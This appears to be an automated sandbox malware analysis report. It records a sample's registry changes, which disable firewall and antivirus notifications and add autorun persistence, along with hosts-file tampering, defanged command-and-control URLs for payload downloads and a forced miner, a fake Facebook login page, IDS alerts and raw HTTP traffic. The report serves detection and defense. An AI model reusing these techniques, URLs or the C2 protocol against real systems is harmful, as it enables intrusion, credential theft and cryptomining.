[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 7D A1 48 A5 BF 24 0F 4F A3 A5 99 98 31 92 AA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

The Malware deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process glhljywourzj.exe:2816 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 41 6C 67 D1 9D C6 14 E5 2D 15 28 AC 0E 93 40"

The process glhljywapnzj.exe:4856 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 19 D3 32 5A C4 6A F1 E7 BF 13 F1 E6 36 F5 B0"

The process glhljywapnzj.exe:4708 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 E0 BC B1 90 4E 7C 0A B3 E6 34 89 67 DA CB 48"

The process glhljyvzcczjsznjntrz.exe:2508 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A 1F 72 58 BC E7 C1 40 00 46 F5 CA B7 44 76 04"

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Presentation Accounts Workstation" = "%System%\unovkkdak.exe"

The process glhljywpp4zj.exe:3992 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "44 59 14 91 20 C0 8B 44 76 E0 CD 66 F7 11 66 9F"

The process glhljyw1jczj.exe:5872 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 97 83 FD 77 F2 98 8D A2 65 5C 26 3B 83 CA 12"

Dropped PE files

HOSTS file anomalies

The Malware modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 804 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://welltalk.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b528200	210.172.144.247
hxxp://wellshirt.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b528200	98.139.135.198
hxxp://wellshirt.net/forum/search.php?method=all&flag&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://wellshirt.net/forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz (2393 MHz)&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://wellshirt.net/forum/search.php?method=dep&noxor&file=dropbox.dep&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://wellshirt.net/dep/dropbox.zip	98.139.135.198
hxxp://wellshirt.net/dep/win64mrocli2.exe	98.139.135.198
hxxp://wellshirt.net/forum/search.php?method=hostname&host=www.facebook.com&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://wellshirt.net/dep/win64mroaes2.exe	98.139.135.198
hxxp://wellshirt.net/forum/search.php?method=dep&noxor&file=purple.dep&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://wellshirt.net/forum/search.php?method=post&type=miner_forced&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://wellshirt.net/dep/purple.zip	98.139.135.198
hxxp://wellshirt.net/forum/search.php?method=checkport&port=48744&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://wellshirt.net/dep/zip.exe	98.139.135.198
hxxp://wellshirt.net/forum/search.php?method=dep&noxor&file=exefile&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://wellshirt.net/forum/search.php?method=all&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://www.fileswap.com/	216.155.129.123
hxxp://www.fileswap.com/_css/global.css?v=54	216.155.129.123
hxxp://www.fileswap.com/_js/jquery.js	216.155.129.123
hxxp://www.fileswap.com/_js/jquery-ui.js	216.155.129.123
hxxp://www.fileswap.com/_js/AC_OETags.js	216.155.129.123
hxxp://www.fileswap.com/_js/global.js?ver=d10	216.155.129.123
hxxp://www.fileswap.com/ext/swfupload/swfupload.js	216.155.129.123
hxxp://www.fileswap.com/ext/swfupload/handlers.js?v=ebg	216.155.129.123
hxxp://www.fileswap.com/_images/footer_bg.png	216.155.129.123
hxxp://www.fileswap.com/_images/ico_24_upload.png	216.155.129.123
hxxp://www.fileswap.com/_images/ico_24_sharelink.png	216.155.129.123
hxxp://www.fileswap.com/_images/ico_24_social.png	216.155.129.123
hxxp://www.fileswap.com/_images/ajax-loader.gif	216.155.129.123
hxxp://www.fileswap.com/_images/icon/ico_footer_twitter.png	216.155.129.123
hxxp://www.fileswap.com/_images/contact_support.png	216.155.129.123
hxxp://www.fileswap.com/_images/header_bg.png	216.155.129.123
hxxp://www.fileswap.com/_images/logo/fileswap_large.png	216.155.129.123
hxxp://www.fileswap.com/_images/header_upload.png	216.155.129.123
hxxp://www.fileswap.com/_images/header_sync.png	216.155.129.123
hxxp://www.fileswap.com/_images/header_upgrade.png	216.155.129.123
hxxp://www.fileswap.com/_images/header_refer.png	216.155.129.123
hxxp://www.fileswap.com/_images/login_highlight.png	216.155.129.123
hxxp://www.fileswap.com/_images/statement_bg.jpg	216.155.129.123
hxxp://e3821.dspe1.akamaiedge.net/en_US/all.js
hxxp://www.fileswap.com/_images/home/home_gradient_01.png	216.155.129.123
hxxp://www.fileswap.com/_images/home/home_upload_01.jpg	216.155.129.123
hxxp://www.fileswap.com/_images/home/home_upload_button.png	216.155.129.123
hxxp://www.fileswap.com/_images/home/home_gradient_02.png	216.155.129.123
hxxp://www.fileswap.com/_images/home/home_signup_button.png	216.155.129.123
hxxp://www.fileswap.com/_images/home/home_upload_02.jpg	216.155.129.123
hxxp://www.fileswap.com/_images/footer_bg2.png	216.155.129.123
hxxp://pagead.l.doubleclick.net/pagead/conversion/1072568869/?random=1401447789574&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://www.fileswap.com/
hxxp://plus.l.google.com/ga.js
hxxp://a749.dsw4.akamai.net/connect/xd_arbiter/V80PAcvrynR.js?version=41
hxxp://plus.l.google.com/__utm.gif?utmwv=5.5.1&utms=1&utmn=811700353&utmhn=www.fileswap.com&utmcs=UTF-8&utmsr=1024x768&utmvp=1243x779&utmsc=32-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=FileSwap.com : Upload Files, Free File Hosting, Cloud Storage&utmhid=2142558865&utmr=-&utmp=/&utmht=1401447789769&utmac=UA-1366737-9&utmcc=__utma=182058928.686437553.1401447790.1401447790.1401447790.1;+__utmz=182058928.1401447790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=q~
hxxp://pagead.l.doubleclick.net/pagead/viewthroughconversion/1072568869/?random=1968204886&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://www.fileswap.com/&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0
hxxp://wellshirt.net/fb_login/?session=3b528200	98.139.135.198
hxxp://www.google.com/ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://www.fileswap.com/&random=2372120351	173.194.43.50
hxxp://www.google.ca/ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://www.fileswap.com/&random=2372120351&ipr=y	173.194.43.56
hxxp://wellshirt.net/fb_login/index_files/VYqjPg0eFkT.css?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/QzuAG9bQwbS.css?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/zWUlWu-0Z1T.css?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/u8iA3kXb8Y1.css?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/z15ZzhgIj4W.css?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/YpD-WuoLxM8.js?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/kHhQaysvKcA.js?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/lV3BV1YRc-7.js?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/wNhnmk7Kpi3.js?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/xgsOhvNndM-.js?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/tjP47PMhke1.js?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/-PAXP-deijE.gif?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/276449379149296_1535348985.png?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/276449379149296_1538611903.png?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/276449379149296_367648155.png?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/276449379149296_646761364.png?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/GsNJNwuI-UM.gif?session=3b528200	98.139.135.198
hxxp://wellshirt.net/fb_login/index_files/safe_image.png?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/?session=3b528200	98.139.135.198
hxxp://www.googleadservices.com/pagead/conversion/1072568869/?random=1401447789574&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://www.fileswap.com/	173.194.43.45
hxxp://static.ak.facebook.com/connect/xd_arbiter/V80PAcvrynR.js?version=41	184.84.243.200
hxxp://middleevery.net/fb_login/index_files/u8iA3kXb8Y1.css?session=3b528200	98.139.135.198
hxxp://connect.facebook.net/en_US/all.js	23.66.191.139
hxxp://www.google-analytics.com/__utm.gif?utmwv=5.5.1&utms=1&utmn=811700353&utmhn=www.fileswap.com&utmcs=UTF-8&utmsr=1024x768&utmvp=1243x779&utmsc=32-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=FileSwap.com : Upload Files, Free File Hosting, Cloud Storage&utmhid=2142558865&utmr=-&utmp=/&utmht=1401447789769&utmac=UA-1366737-9&utmcc=__utma=182058928.686437553.1401447790.1401447790.1401447790.1;+__utmz=182058928.1401447790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=q~	173.194.43.38
hxxp://middleevery.net/fb_login/index_files/lV3BV1YRc-7.js?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/z15ZzhgIj4W.css?session=3b528200	98.139.135.198
hxxp://middleevery.net/dep/win64mrocli2.exe	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/safe_image.png?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/kHhQaysvKcA.js?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/QzuAG9bQwbS.css?session=3b528200	98.139.135.198
hxxp://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072568869/?random=1968204886&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://www.fileswap.com/&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0	173.194.43.58
hxxp://middleevery.net/dep/zip.exe	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/YpD-WuoLxM8.js?session=3b528200	98.139.135.198
hxxp://middleevery.net/dep/dropbox.zip	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/wNhnmk7Kpi3.js?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/276449379149296_1538611903.png?session=3b528200	98.139.135.198
hxxp://middleevery.net/dep/win64mroaes2.exe	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/GsNJNwuI-UM.gif?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/276449379149296_646761364.png?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/276449379149296_1535348985.png?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/276449379149296_367648155.png?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/-PAXP-deijE.gif?session=3b528200	98.139.135.198
hxxp://middleevery.net/dep/purple.zip	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/zWUlWu-0Z1T.css?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/xgsOhvNndM-.js?session=3b528200	98.139.135.198
hxxp://middleevery.net/fb_login/index_files/VYqjPg0eFkT.css?session=3b528200	98.139.135.198
hxxp://www.google-analytics.com/ga.js	173.194.43.38
hxxp://middleevery.net/fb_login/index_files/tjP47PMhke1.js?session=3b528200	98.139.135.198
minin.gs	107.170.193.84
fbstatic-a.akamaihd.net	184.84.243.200
s-static.ak.facebook.com	23.66.178.110
apis.google.com	173.194.43.40
chat.facebook.com	173.252.107.17
error.facebook.com	31.13.69.160

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack
SURICATA STREAM FIN out of window
SURICATA STREAM FIN invalid ack
GPL CHAT MISC Jabber/Google Talk Outgoing Traffic
ET CHAT Facebook Chat using XMPP
ET MALWARE Possible Windows executable sent when remote host claims to send html content

Traffic

GET /pagead/viewthroughconversion/1072568869/?random=1968204886&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.fileswap.com/&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: googleads.g.doubleclick.net

HTTP/1.1 302 Found

P3P: policyref="hXXp://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

Date: Fri, 30 May 2014 15:56:12 GMT

Pragma: no-cache

Expires: Fri, 01 Jan 1990 00:00:00 GMT

Cache-Control: no-cache, must-revalidate

Location: hXXp://VVV.google.com/ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://VVV.fileswap.com/&random=2372120351

Content-Type: image/gif

X-Content-Type-Options: nosniff

Server: cafe

Content-Length: 42

X-XSS-Protection: 1; mode=block

Alternate-Protocol: 80:quic

Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 30-May-2014 16:11:12 GMT; path=/; domain=.doubleclick.net
GIF89a.............!.......,...........D.;..

GET /fb_login/?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Referer: hXXp://VVV.fileswap.com/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:12 GMT

Set-Cookie: BX=dbnbs819ohags&b=3&s=gs; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.middleevery.net

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 2

Connection: close

Server: YTS/1.20.28
.<!DOCTYPE html>.<html id="facebook" class="canHaveFixedEleme
nts" lang="en"><head>.<meta http-equiv="content-type" cont
ent="text/html; charset=UTF-8"><meta charset="utf-8"><scri
pt>function envFlush(a){function b(c){for(var d in a)c[d]=a[d];}if(
window.requireLazy){requireLazy(['Env'],b);}else{Env=window.Env||{};b(
Env);}}envFlush({"ffid1":"AcHKD6PoX2xFbcVkoIMPSwT-mjiSNxXUTRjwUd3Yp1_E
YEq_w-NFvMeWHUfw1XVxiiw","ffid2":"AcEFu56i6aA6VpuY7zf28xde8QxejU8YtgQM
ai3iTb5YgCTNuz8hNm_PaLGlodmqOpY","ffid3":"AcH3wXq-O_VXCipLT3BNx1Yj1vIR
_2-_Sm91YeYGWEygxMYVX2ZYA3lca5O1VnMT7JIGk_NVjQ_r52TNgis-_3Fh","ffid4":
"AcHbEP4Fkpz1ZfifbEso0ekacGz00hYYhksxdiDUrQfBTGODZ1mWbHJKRANR8uDDsk8",
"ffver":63083,"recaptcha_focus_on_load":"false","recaptcha_lang":"\"en
\"","user":"0","locale":"en_US","method":"GET","svn_rev":772429,"tier"
:"","push_phase":"V3","pkg_cohort":"EXP1:DEFAULT","vip":"69.171.229.25
","www_base":"http:\/\/VVV.facebook.com\/","rep_lag":2,"fb_dtsg":"AQBu
tNFh","ajaxpipe_token":"AXgCPts7l-QsNxPv","lhsh":"4AQGq_2W7","tracking
_domain":"https:\/\/pixel.facebook.com","retry_ajax_on_network_error":
"1","fbid_emoticons":"1"});</script><script>envFlush({"eag
leEyeConfig":{"seed":"0ejD"}});CavalryLogger=false;</script><
noscript><meta http-equiv="refresh" content="0; URL=/?_fb_noscri
pt=1" /></noscript><meta name="robots" content="noodp, noy
dir"><meta name="referrer" content="default" id="meta_referrer"&
gt;<meta name="description" content="Facebook is a social utili
<<< skipped >>>

GET /fb_login/index_files/u8iA3kXb8Y1.css?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/css,*/*;q=0.1

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 103

Content-Type: text/css

Age: 0

Connection: close

Server: YTS/1.20.28
/*1354335490,178142533*/...fbRegistrationPPT .text{font-size:11px}..#b
ootloader_VuNPD { height: 42px; }..

GET /connect/xd_arbiter/V80PAcvrynR.js?version=41 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Referer: hXXp://VVV.fileswap.com/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: static.ak.facebook.com

HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8

X-Content-Type-Options: nosniff

X-XSS-Protection: 0

Content-Encoding: gzip

X-FB-Debug: LzWU/tjEwMFRT0 02NV5KDUHMw6QAuPeUPFnPwyiNEM=

Vary: Accept-Encoding

Content-Length: 8779

Cache-Control: public, max-age=31356073

Expires: Thu, 28 May 2015 13:57:25 GMT

Date: Fri, 30 May 2014 15:56:12 GMT

Connection: keep-alive
...........|i..F..w....]@..Q..n..U#..G3.F...&.z.@....,.........H.(....
..(.yFFDF........_|....V....k..3..:.....b..&..z.&Y..9..0...,c.0.[...&l
t;.n...-.w......K.y~c.....8o..7......%3.k.#..y..M3..'.|..E..a.;.lS./..
z?.p/o..$O...7..S..IM.E.4...%..%....}.....l.,..=;.;TuN.....a.=.......|
..-.u..%..J..vw...[..}y...U.M.cC<.N.~....W...,...(IRG<.a.c..Z...
K&......( .....BO.IF.Ln.:..A.......P.2Mar.E.....A.5#.....)..39.......9
........c.$.]H...(.b..X...X<...A....#.d^@...,L........F9O.......9&.
&.70...3h y.\.Z.9.h..Is...d.^.krfq|...9Y...4!s...a..c.L.Bl..*CP..^.U..
J...ba.^8pCwL.Z.........~fuY2..T...../M.....K.c.........J..-..vH...]..
.N.......$.#.n..B.F...I..il\.!0bY.Z...9..{50......\P0]....:.*F...d.}..
.....fwP.....Q...F:.1..H....F..bL.... Ix.......\.."...u..N..e.....m@..
...:.Fa....bM7h4...2w...x:[email protected]..._x.J-. ..(.....m ..8.-f.M..... .\i
....ky.4.dLM............ [email protected].%..d 5.....)v...c..i...(.~..
......G.2d6.7.C.Z.0.`. .0.Yd-Y..v.g....c8.r.H........7.....O({.......,
[email protected]........<!..x4j..........e.k.._........3...Y....E.b..
.X.E.[Cn..... [email protected].=...S V..."%...6.......?p<.Y.!.....&....s
.&..vbr..w...9......rds..o.!.f.y.....d.........n.......Xs....Z.R.j....
A.%..~.....?..'.0>..C.......hp..x.]..9.b...U..n..Ig"....P9.......=.
...r.0{....F.:......@o....."...........1..&q.@...:..P......E.....pa...
..O...........~...h....!O...J......S......Z......_........x.......W..&
gt;..../...^C|....../O........e.G.w4."...Zc.o0Y._..q............/L....
....A.}....\<.......G.q...xL..&.jX.....w.....k..^.....&hA...0J}
<<< skipped >>>

GET /connect/xd_arbiter/V80PAcvrynR.js?version=41 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Referer: hXXp://VVV.fileswap.com/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: static.ak.facebook.com

HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8

X-Content-Type-Options: nosniff

X-XSS-Protection: 0

Content-Encoding: gzip

X-FB-Debug: LzWU/tjEwMFRT0 02NV5KDUHMw6QAuPeUPFnPwyiNEM=

Vary: Accept-Encoding

Content-Length: 8779

Cache-Control: public, max-age=31356072

Expires: Thu, 28 May 2015 13:57:25 GMT

Date: Fri, 30 May 2014 15:56:13 GMT

Connection: keep-alive
...........|i..F..w....]@..Q..n..U#..G3.F...&.z.@....,.........H.(....
..(.yFFDF........_|....V....k..3..:.....b..&..z.&Y..9..0...,c.0.[...&l
t;.n...-.w......K.y~c.....8o..7......%3.k.#..y..M3..'.|..E..a.;.lS./..
z?.p/o..$O...7..S..IM.E.4...%..%....}.....l.,..=;.;TuN.....a.=.......|
..-.u..%..J..vw...[..}y...U.M.cC<.N.~....W...,...(IRG<.a.c..Z...
K&......( .....BO.IF.Ln.:..A.......P.2Mar.E.....A.5#.....)..39.......9
........c.$.]H...(.b..X...X<...A....#.d^@...,L........F9O.......9&.
&.70...3h y.\.Z.9.h..Is...d.^.krfq|...9Y...4!s...a..c.L.Bl..*CP..^.U..
J...ba.^8pCwL.Z.........~fuY2..T...../M.....K.c.........J..-..vH...]..
.N.......$.#.n..B.F...I..il\.!0bY.Z...9..{50......\P0]....:.*F...d.}..
.....fwP.....Q...F:.1..H....F..bL.... Ix.......\.."...u..N..e.....m@..
...:.Fa....bM7h4...2w...x:[email protected]..._x.J-. ..(.....m ..8.-f.M..... .\i
....ky.4.dLM............ [email protected].%..d 5.....)v...c..i...(.~..
......G.2d6.7.C.Z.0.`. .0.Yd-Y..v.g....c8.r.H........7.....O({.......,
[email protected]........<!..x4j..........e.k.._........3...Y....E.b..
.X.E.[Cn..... [email protected].=...S V..."%...6.......?p<.Y.!.....&....s
.&..vbr..w...9......rds..o.!.f.y.....d.........n.......Xs....Z.R.j....
A.%..~.....?..'.0>..C.......hp..x.]..9.b...U..n..Ig"....P9.......=.
...r.0{....F.:......@o....."...........1..&q.@...:..P......E.....pa...
..O...........~...h....!O...J......S......Z......_........x.......W..&
gt;..../...^C|....../O........e.G.w4."...Zc.o0Y._..q............/L....
....A.}....\<.......G.q...xL..&.jX.....w.....k..^.....&hA...0J}
<<< skipped >>>

GET /forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz (2393 MHz)&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:38 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
.............

GET /en_US/all.js HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://VVV.fileswap.com/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: connect.facebook.net

HTTP/1.1 200 OK

ETag: "fd8c6a9f92c55c011adcbc409e00026e"

